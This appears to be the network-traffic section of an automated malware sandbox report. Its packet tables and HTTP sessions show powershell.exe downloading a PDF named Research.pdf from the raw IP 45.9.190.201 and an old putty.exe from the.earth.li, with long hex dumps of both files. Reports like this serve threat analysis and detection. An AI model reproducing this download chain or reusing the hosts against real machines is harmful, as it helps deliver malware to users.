                          Oct 6, 2023 15:30:13.966325998 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.966342926 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.966379881 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.966381073 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.966409922 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.966442108 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.966829062 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.966845989 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.966859102 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.966878891 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.966882944 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.966917038 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.967000008 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.967015982 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.967051029 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.967300892 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.967324972 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.967334032 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.967366934 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.967367887 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.967392921 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.967402935 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.967432022 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.967469931 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.967742920 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.967760086 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.967772007 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.967796087 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.967829943 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.967868090 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.967870951 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.967907906 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.967943907 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.968110085 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.968125105 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.968161106 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.968204975 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.968250990 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.968290091 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.968406916 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.968421936 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.968453884 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.968456984 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.968470097 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.968493938 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.968506098 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.968516111 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.968578100 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.968739986 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.968755007 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.968787909 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.968893051 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.968907118 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.968941927 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:14.824417114 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:14.824584961 CEST4970980192.168.2.893.93.131.124

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 6, 2023 15:30:11.860217094 CEST6300153192.168.2.81.1.1.1
                          Oct 6, 2023 15:30:12.042332888 CEST53630011.1.1.1192.168.2.8

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Oct 6, 2023 15:30:11.860217094 CEST192.168.2.81.1.1.10xdb9fStandard query (0)the.earth.liA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Oct 6, 2023 15:30:12.042332888 CEST1.1.1.1192.168.2.80xdb9fNo error (0)the.earth.li93.93.131.124A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • 45.9.190.201
                          • the.earth.li

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.84970845.9.190.20180C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          TimestampkBytes transferredDirectionData
                          Oct 6, 2023 15:30:10.432358980 CEST0OUTGET /Research.pdf HTTP/1.1
                          Host: 45.9.190.201
                          Connection: Keep-Alive
                          Oct 6, 2023 15:30:10.711105108 CEST2INHTTP/1.1 200 OK
                          Date: Fri, 06 Oct 2023 13:30:10 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Last-Modified: Tue, 03 Oct 2023 23:57:26 GMT
                          ETag: "19e0d-606d8a71f94a6"
                          Accept-Ranges: bytes
                          Content-Length: 105997
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/pdf
                          Data Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 32 38 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 31 30 38 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 31 30 39 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 33 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 32 31 20 30 20 52 20 32 33 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20 32 20 30 20 52 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 46 6f 6e 74 3c 3c 2f 46 31 20 35 20 30 20 52 2f 46 32 20 31 32 20 30 20 52 2f 46 33 20 31 34 20 30 20 52 2f 46 34 20 31 39 20 30 20 52 3e 3e 2f 45 78 74 47 53 74 61 74 65 3c 3c 2f 47 53 31 30 20 31 30 20 30 20 52 2f 47 53 31 31 20 31 31 20 30 20 52 3e 3e 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 2f 54 65 78 74 2f 49 6d 61 67 65 42 2f 49 6d 61 67 65 43 2f 49 6d 61 67 65 49 5d 20 3e 3e 2f 4d 65 64 69 61 42 6f 78 5b 20 30 20 30 20 35 39 35 2e 33 32 20 38 34 31 2e 39 32 5d 20 2f 43 6f 6e 74 65 6e 74 73 20 34 20 30 20 52 2f 47 72 6f 75 70 3c 3c 2f 54 79 70 65 2f 47 72 6f 75 70 2f 53 2f 54 72 61 6e 73 70 61 72 65 6e 63 79 2f 43 53 2f 44 65 76 69 63 65 52 47 42 3e 3e 2f 54 61 62 73 2f 53 2f 53 74 72 75 63 74 50 61 72 65 6e 74 73 20 30 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 34 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 4c 65 6e 67 74 68 20 31 33 37 37 3e 3e 0d 0a 73 74 72 65 61 6d 0d 0a 78 9c b5 5a 4d 8b e4 36 10 bd 37 f4 7f d0 71 37 30 1a 95 be 0d 83 a1 db 3d b3 24 64 0f 61 07 02 09 39 2c 61 33 a7 0c f9 f8 ff 10 49 25 d9 92 5b ee 55 76 ac 65 07 b7 bb ed 56 f9 d5 ab d2 ab aa 26 f7 9f fe fa fc 4a 1e 1e ee 3f 4e df 5f 08 bb ff f1 f3 eb 0b 79 f7 e5 f5 ee 97 d3 fb 71 24 e7 cb 44 fe 3e 1e 18 65 fe 9f b5 06 08 23 6a 50 54 70 62 25 d0 81 93 7f be 1c 0f 3f 7f 47 5e 8f 87 f3 f3 f1 70 ff 04 04 38 79 fe e3 78 f0 97 32 02 c4 70 ca b8 24 46 59 aa 25 79 fe d3 5d f4 e1 13 30 f2 f2 af fb 62 f2 82 a7 10 4f 3f 1c 0f bf 3e 30 26 14 63 d2 32 a6 f4 78 a7 1e fc eb f1 4e f8 a3 c4 a3 52 e3 e0 4f 75 7c fb ec ac 13 ee bf 48 1f bb 3f ee fe 44 3c ea d1 66 77 cb a7 f1 37 f2 fc c3 f1 f0 e8 2c fe e9 78 f8 9f 4f c8 d7 4f 08 96 51 53 3c 61 78 2e 7c 9a 77 e4 7d b1 18 79 fc 38 11 52 e2 0e 3b e0 2e b6 70 e7 9c 0e 76 6d 95 c7 d8 8c 12 3c 1a 93 03 c8 78 54 10 73 b8 20 4a 01 d0 47 7c 2d a6 d1 1a 0f 2c 1f b5 3f d8 05 e7 70 99 1a 45 e6 25 a5 6b 1e 0b ee 02 74 57 5a 61 04 7b c3 12 c9 de e4 27 b9 46 84 83 bb ce 6c 20 d2 e2 27 de d1 4f da 1a 2a 75 cd 4f 8e d4 3c 21 e8 63 c2 9d cb 35 b2 16 e3 c1 2c ae 93 0a 43 47 4d c1 a5 bb 02 09 d2 11 de 6e 98 dc 02 a4 e8 09 a4 02 6a 79 0d c8 47 24 b2 42 22 23 78
                          Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 28 0 R/MarkInfo<</Marked true>>/Metadata 108 0 R/ViewerPreferences 109 0 R>>endobj2 0 obj<</Type/Pages/Count 3/Kids[ 3 0 R 21 0 R 23 0 R] >>endobj3 0 obj<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 12 0 R/F3 14 0 R/F4 19 0 R>>/ExtGState<</GS10 10 0 R/GS11 11 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 595.32 841.92] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>endobj4 0 obj<</Filter/FlateDecode/Length 1377>>streamxZM67q70=$da9,a3I%[UveV&J?N_yq$D>e#jPTpb%?G^p8yx2p$FY%y]0bO?>0&c2xNROu|H?D<fw7,xOOQS<ax.|w}y8R;.pvm<xTs JG|-,?pE%ktWZa{'Fl 'O*uO<!c5,CGMnjyG$B"#x
                          Oct 6, 2023 15:30:10.711119890 CEST3INData Raw: 6b 26 43 a4 68 02 97 15 cc de 9b 91 20 2c e5 7a c3 e4 16 20 e5 0e 40 5e 59 95 80 04 4d e1 9b e2 44 75 74 af 72 c9 56 d7 e2 84 fb cc 21 7d 06 89 be 8a 3e db 9d fc cc 91 7f c3 8c 16 70 74 4f 70 a4 a4 c3 b0 c5 7d 8d 89 23 71 de 67 88 9c e3 13 66 ee
                          Data Ascii: k&Ch ,z @^YMDutrV!}>ptOp}#qgfQQK^fGAUO0jt*Xe;2@Ao +n7:[:Tw'jygaI>.cw$.PW8f^VLYb?g5K.)
                          Oct 6, 2023 15:30:10.711133003 CEST4INData Raw: 39 20 30 20 52 2f 57 20 31 30 30 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 38 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 4f 72 64 65 72 69 6e 67 28 49 64 65 6e 74 69 74 79 29 20 2f 52 65 67 69 73 74 72 79 28 41 64 6f 62 65 29 20 2f 53 75 70 70 6c 65
                          Data Ascii: 9 0 R/W 100 0 R>>endobj8 0 obj<</Ordering(Identity) /Registry(Adobe) /Supplement 0>>endobj9 0 obj<</Type/FontDescriptor/FontName/Arial-BoldMT/Flags 32/ItalicAngle 0/Ascent 905/Descent -210/CapHeight 728/AvgWidth 479/MaxWidth 2628/F
                          Oct 6, 2023 15:30:10.711152077 CEST6INData Raw: 6c 4d 54 2f 46 6c 61 67 73 20 33 32 2f 49 74 61 6c 69 63 41 6e 67 6c 65 20 30 2f 41 73 63 65 6e 74 20 39 30 35 2f 44 65 73 63 65 6e 74 20 2d 32 31 30 2f 43 61 70 48 65 69 67 68 74 20 37 32 38 2f 41 76 67 57 69 64 74 68 20 34 34 31 2f 4d 61 78 57
                          Data Ascii: lMT/Flags 32/ItalicAngle 0/Ascent 905/Descent -210/CapHeight 728/AvgWidth 441/MaxWidth 2665/FontWeight 400/XHeight 250/Leading 33/StemV 44/FontBBox[ -665 -210 2000 728] /FontFile2 103 0 R>>endobj19 0 obj<</Type/Font/Subtype/TrueType/Name
                          Oct 6, 2023 15:30:10.711165905 CEST7INData Raw: 7c 79 30 b0 7e 3c 58 38 00 dc 43 59 01 9a c5 df 3f 87 99 75 3a a7 3b 58 58 d0 0d 53 b3 a3 07 08 3b 68 0b bb 3c b4 3b 95 ca 87 e5 c1 42 72 04 23 cc 6c 7b aa 80 5e 46 1b c4 c7 e3 a0 49 88 9f 6d c1 2d 2c c3 b4 03 a3 35 e0 66 1b 80 7b b1 a9 04 6e 65
                          Data Ascii: |y0~<X8CY?u:;XXS;h<;Br#l{^FIm-,5f{ne4]CNIkUKUP& YDi66&;0C1m&h_C\eH2i,yhmH'y=5W;l&_x}hT`;\1#HCs
                          Oct 6, 2023 15:30:10.711183071 CEST8INData Raw: 20 31 31 20 30 20 52 3e 3e 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 2f 54 65 78 74 2f 49 6d 61 67 65 42 2f 49 6d 61 67 65 43 2f 49 6d 61 67 65 49 5d 20 3e 3e 2f 4d 65 64 69 61 42 6f 78 5b 20 30 20 30 20 35 39 35 2e 33 32 20 38 34 31 2e 39 32 5d 20
                          Data Ascii: 11 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 595.32 841.92] /Contents 24 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 2>>endobj24 0 obj<</Filter/FlateDecode/Length 343>>streamxRMK
                          Oct 6, 2023 15:30:10.711196899 CEST10INData Raw: 6f 64 65 2f 4c 65 6e 67 74 68 20 31 30 33 32 3e 3e 0d 0a 73 74 72 65 61 6d 0d 0a 78 9c cd 57 5d 6b dc 3a 10 7d 2f f4 3f cc 3f b0 35 fa 86 52 68 6f 5b 5a da 86 90 0d f4 a1 f4 c1 49 7c 93 a5 bb eb b2 71 a0 f9 f7 f7 28 e3 c4 bb 20 c7 b5 fa 72 61 59
                          Data Ascii: ode/Length 1032>>streamxW]k:}/??5Rho[ZI|q( raYY>#H{R5&kC&kGhde#4gMNssH jLQ%k46QTQ,aXa:209E@Bs(SZk8>IBJc0Q 10tD#(
                          Oct 6, 2023 15:30:10.711267948 CEST11INData Raw: ef 3e b8 38 bb d1 cb 83 d0 03 dc 11 f6 6a 05 58 a9 26 7a f9 ac 3b cf dd 6a cc 37 cc a0 1c 8d 48 55 51 01 a3 2f f4 dc 9b 97 7e 06 ca 82 ec da 0a 1f 97 6e bb 7a cd 5f c6 c7 66 80 26 81 63 34 c3 b5 80 c5 f4 1c 6c af 26 20 65 e4 4f 45 cb c6 9f 8a 80
                          Data Ascii: >8jX&z;j7HUQ/~nz_f&c4l& eOE6d>;)E@[<FR)CzD*:9:'>NKh&h6O(/_S%4endstreamendobj99 0 obj<</Filter/FlateDecode/Length
                          Oct 6, 2023 15:30:10.711282015 CEST12INData Raw: 53 41 cd 79 df d0 54 a2 9a ca 79 4d 22 c9 65 50 96 9f 27 d7 b8 64 f5 e5 6a 97 1c 22 33 a7 34 62 fd fb d5 2e bf ac 9e d6 ea 13 b5 fa 56 ad 6e c6 ba d3 89 00 b9 c6 36 bf 5a 56 49 40 ae 51 6b 97 cd ef ac 09 54 e3 70 dd 71 c6 2a 57 55 8b 31 3f 0f ba
                          Data Ascii: SAyTyM"eP'dj"34b.Vn6ZVI@QkTpq*WU1?qXj&V5c)hQ\s4U4Tg8<TqVU{5QuUM#/`rw^^\kUHj8xbU{3]vvn):Y@g-NX
                          Oct 6, 2023 15:30:10.711294889 CEST14INData Raw: 2e d3 e4 63 dc 23 50 8b f2 a1 1e 4f a6 a3 ff 20 77 8f 86 fa 01 1b 14 a7 1f 17 0d ad 71 3d 66 8b af bf c2 c0 8d c3 5e 95 bb 0b 37 e0 2e 6d f2 ad 3d 9e d1 3e a8 f0 70 39 50 88 4c d1 c7 ab b1 b6 5a 0b fa 4e ac 75 e2 ae 75 e2 4e 75 e2 4e 75 a2 51 9d
                          Data Ascii: .c#PO wq=f^7.m=>p9PLZNuuNuNuQ}mMSVn9lEuV)AthV8:F:$c0l$McsK1j-:jKe0@k0Z21v`Cp5d>D3'WvcxC7QL.
                          Oct 6, 2023 15:30:10.989872932 CEST15INData Raw: 58 0c 8f 37 e5 10 8f e2 98 3b 44 66 28 46 c7 a1 fc 87 51 b9 c2 11 ac 30 32 7d bc 3f 74 0f 49 95 c9 a7 1c bb dd 9b 1c 0f e2 58 c4 fd b4 e3 01 c7 70 c7 5d f9 21 3d 36 7f 1f ed de a4 4d 11 74 ac c5 d7 cd 7d 4a 92 a3 c3 51 e8 68 cb 3f e9 58 ea b8 ca
                          Data Ascii: X7;Df(FQ02}?tIXp]!=6Mt}JQh?Xhrc{q3{QNU+!Z-(1%=^"JU%VcE%^&d}^[&QA(^_NbBOj_RpI\k$uj-_6B


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          1192.168.2.84970993.93.131.12480C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          TimestampkBytes transferredDirectionData
                          Oct 6, 2023 15:30:12.350323915 CEST111OUTGET /~sgtatham/putty/0.63/x86/putty.exe HTTP/1.1
                          Host: the.earth.li
                          Connection: Keep-Alive
                          Oct 6, 2023 15:30:12.620089054 CEST113INHTTP/1.1 200 OK
                          Date: Fri, 06 Oct 2023 13:30:12 GMT
                          Server: Apache
                          Last-Modified: Tue, 06 Aug 2013 17:32:58 GMT
                          ETag: "79000-4e34ad0df95b5"
                          Accept-Ranges: bytes
                          Content-Length: 495616
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/x-msdos-program
                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6e 1f 98 4b 2a 7e f6 18 2a 7e f6 18 2a 7e f6 18 39 76 9f 18 28 7e f6 18 2f 72 96 18 28 7e f6 18 2f 72 f9 18 31 7e f6 18 39 76 ab 18 28 7e f6 18 d0 5d ef 18 2e 7e f6 18 a9 76 ab 18 3b 7e f6 18 2a 7e f7 18 1a 7f f6 18 2f 72 a9 18 96 7e f6 18 c6 75 a8 18 2b 7e f6 18 2f 72 ac 18 2b 7e f6 18 52 69 63 68 2a 7e f6 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 86 2e 01 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 07 0a 00 60 05 00 00 60 02 00 00 00 00 00 25 f1 04 00 00 10 00 00 00 70 05 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 07 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 0c 07 00 f0 00 00 00 00 90 07 00 90 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 07 00 48 00 00 00 00 00 00 00 00 00 00 00 00 70 05 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b1 5f 05 00 00 10 00 00 00 60 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2a b6 01 00 00 70 05 00 00 c0 01 00 00 70 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 58 00 00 00 30 07 00 00 20 00 00 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 3b 00 00 00 90 07 00 00 40 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$nK*~*~*~9v(~/r(~/r1~9v(~].~v;~*~/r~u+~/r+~Rich*~PEL.R``%p@(;Hp.text_` `.rdata*pp@@.dataX0 0@.rsrc;@P@@
                          Oct 6, 2023 15:30:12.620120049 CEST114INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Data Ascii:
                          Oct 6, 2023 15:30:12.620131969 CEST115INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Data Ascii:
                          Oct 6, 2023 15:30:12.620145082 CEST117INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Data Ascii:
                          Oct 6, 2023 15:30:12.620158911 CEST118INData Raw: 85 c0 59 75 a0 85 db 0f 85 3b 08 00 00 56 6a 02 ff 75 14 89 35 d4 74 47 00 e8 79 11 00 00 53 ff 75 14 e8 1f 0e 00 00 50 6a 37 ff 75 14 e8 3e 12 00 00 83 c4 20 68 28 77 45 00 ff 75 08 e8 9a b1 04 00 85 c0 59 59 75 11 85 db 89 7d fc 0f 8c 52 ff ff
                          Data Ascii: Yu;Vju5tGySuPj7u> h(wEuYYu}R=tGh$wEuvYYuH9EujXej^uUuRYmuj2uj^hwEuYYu;9EtuuYu
                          Oct 6, 2023 15:30:12.620171070 CEST119INData Raw: 0f 85 99 fa ff ff 85 db 0f 85 34 03 00 00 57 6a 1a ff 75 14 e8 78 0c 00 00 83 c4 0c 68 00 76 45 00 ff 75 08 e8 ad ac 04 00 85 c0 59 59 74 26 68 f4 75 45 00 ff 75 08 e8 9a ac 04 00 85 c0 59 59 74 13 68 e8 75 45 00 ff 75 08 e8 87 ac 04 00 85 c0 59
                          Data Ascii: 4WjuxhvEuYYt&huEuYYthuEuYYu4}?usY,SjuuhuEV?YYu:}VjX,Ytu3VWjuhuEVYYu/}
                          Oct 6, 2023 15:30:12.620187998 CEST121INData Raw: 7f 53 74 4d 83 f8 31 7c 63 83 f8 32 7e 2f 83 f8 34 7e 59 83 f8 39 7e 1d 83 f8 44 74 12 83 f8 4e 74 09 83 f8 52 75 45 6a 02 eb 06 6a 00 eb 02 6a 03 6a 3c eb 0f 83 c0 d0 50 6a 39 eb 07 8d 44 00 a0 50 6a 3a ff 75 14 e8 3f 07 00 00 83 c4 0c eb 71 6a
                          Data Ascii: StM1|c2~/4~Y9~DtNtRuEjjjj<Pj9DPj:u?qjet(tItIttPh8uEGjjjjjj;uWh4uEVuWVCYtPj8VhuE0YY>E^_[VWCG39>~t$Fjp
                          Oct 6, 2023 15:30:12.620295048 CEST122INData Raw: 45 fc 6a 00 8d 45 f8 50 8b 45 08 ff 30 89 75 f8 e8 cd 5b 03 00 83 c4 0c 85 c0 5f 5e 74 05 8b 40 08 c9 c3 33 c0 c9 c3 56 ff 74 24 10 ff 74 24 10 ff 74 24 10 e8 7a ff ff ff 8b f0 83 c4 0c 85 f6 75 17 68 1a 01 00 00 68 70 77 45 00 68 30 78 45 00 e8
                          Data Ascii: EjEPE0u[_^t@3Vt$t$t$zuhhpwEh0xE^UQQVu<X0GWpwEth$WhxE<3Gth%WhwEEutEjEgvEjEjPE0+[t90uHU@3_^UQQ
                          Oct 6, 2023 15:30:12.620307922 CEST123INData Raw: 13 68 a5 01 00 00 57 68 34 78 45 00 e8 3b 9e 04 00 83 c4 0c ff 74 24 18 89 33 e8 9c 3c 04 00 8b 7c 24 14 59 89 43 08 e8 de f7 ff ff 5f 5e 5b c3 53 56 57 6a 0c 6a 01 e8 68 8c 00 00 8b 74 24 1c 83 3c b5 58 30 47 00 00 59 59 8b d8 bf 70 77 45 00 74
                          Data Ascii: hWh4xE;t$3<|$YC_^[SVWjjht$<X0GYYpwEthWhwE<3GthWh\xEt$3>|$YCo_^[S\$UVW33hX0GHtHuvMY|3GHt4Ht"HtHu.jvT>YY
                          Oct 6, 2023 15:30:12.620321035 CEST125INData Raw: 75 10 e8 72 f8 ff ff 83 c4 14 5f 5e 5b 5d c3 55 8b ec 83 ec 50 53 56 57 8b 7d 08 8b 77 2c 85 f6 8b 5f 14 7e 4e 83 7d 14 00 75 1b 53 ff 75 10 e8 f4 f4 ff ff 50 ff 75 0c 57 e8 08 84 03 00 83 c4 14 e9 dd 00 00 00 83 7d 14 02 0f 85 d3 00 00 00 ff 75
                          Data Ascii: ur_^[]UPSVW}w,_~N}uSuPuW}uW5VSuV}u\SuYYEuPEh{EP#EuEQQE$h{EPEPuWpH}uBuWYYWu
                          Oct 6, 2023 15:30:12.888853073 CEST126INData Raw: 05 3b 77 24 7c 17 68 3c 01 00 00 68 b4 7b 45 00 68 64 7b 45 00 e8 26 94 04 00 83 c4 0c 8b 47 30 ff 34 b0 6a 73 ff 75 10 e8 46 f3 ff ff 83 c4 0c 5f 5e 5d c3 55 8b ec 83 7d 14 00 56 57 75 57 6a 4b ff 75 10 e8 d5 ee ff ff 85 c0 59 59 74 05 6a 02 5e
